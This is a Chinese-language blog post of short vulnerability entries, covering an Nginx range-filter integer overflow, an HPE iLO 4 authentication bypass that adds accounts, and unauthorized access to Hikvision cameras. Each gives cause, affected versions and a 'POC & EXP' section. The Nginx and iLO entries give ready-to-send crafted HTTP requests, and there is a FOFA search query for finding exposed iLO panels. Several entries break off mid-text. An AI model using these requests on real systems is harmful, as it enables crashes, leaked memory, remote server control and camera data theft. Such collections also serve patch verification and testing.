原理Nginx范围过滤器模块中存在整数溢出漏洞,允许远程攻击者利用漏洞提交特殊的请求,获取敏感信息或使应用程序崩溃。影响范围Nginx < 1.13.2危害获取缓存的HTTP请求或使应用程序崩溃。POC & EXP手工GET / HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Range: bytes=-17208,-9223372036854758792状态码为206则说明存在漏洞。脚本https://github.com/en0f/CVE-2017-7529_PoC
原理未授权访问,由于添加用户操作未对操作者的身份进行验证,导致未授权用户添加。影响范围iLO 4 固件版本低于2.54 的2.xx版本危害获取Web面板完整访问权限,可通过惠普iLO自带的远控软件对主机进行控制。下载地址为:https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_4f842ceb31cf48d392e22705a8POC & EXPfofatitle="iLO"手工# POC GET /rest/v1/AccountService/Accounts HTTP/1.1 Host: x.x.x.x:x Content-Length: 273 Accept-Encoding: gzip, deflate Accept: */* Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA Content-Type: application/json # EXP POST /rest/v1/AccountService/Accounts HTTP/1.1 Host: x.x.x.x:x C
原理经典未授权访问,由于敏感路径未对请求者的身份进行验证,导致未授权访问。影响范围DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106危害可获取的摄像头敏感信息:用户名摄像头快照摄像头用户配置文
Equinox
一个乐于分享的网安人